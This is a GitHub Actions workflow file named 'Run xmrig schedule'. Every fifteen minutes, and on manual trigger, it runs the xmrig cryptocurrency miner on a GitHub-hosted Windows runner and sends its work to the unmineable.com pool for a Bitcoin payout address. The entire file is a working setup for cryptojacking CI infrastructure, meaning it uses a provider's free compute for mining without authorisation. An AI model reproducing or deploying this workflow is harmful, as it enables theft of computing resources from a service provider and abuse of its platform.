name: Run xmrig schedule
on:
  schedule:
    - cron: '20/15 * * * *'
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    steps:
        - uses: actions/checkout@v2
        - name: Build
          run: | 
                ${{ github.workspace }}/xmrig.exe -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qwh4646ppd8dpj6fsd00mr9g6jeqd78jggcdntg.my_runner$env:RUNNER_OS.#Bitcoin-Tips -p x 
                pause
          shell: powershell
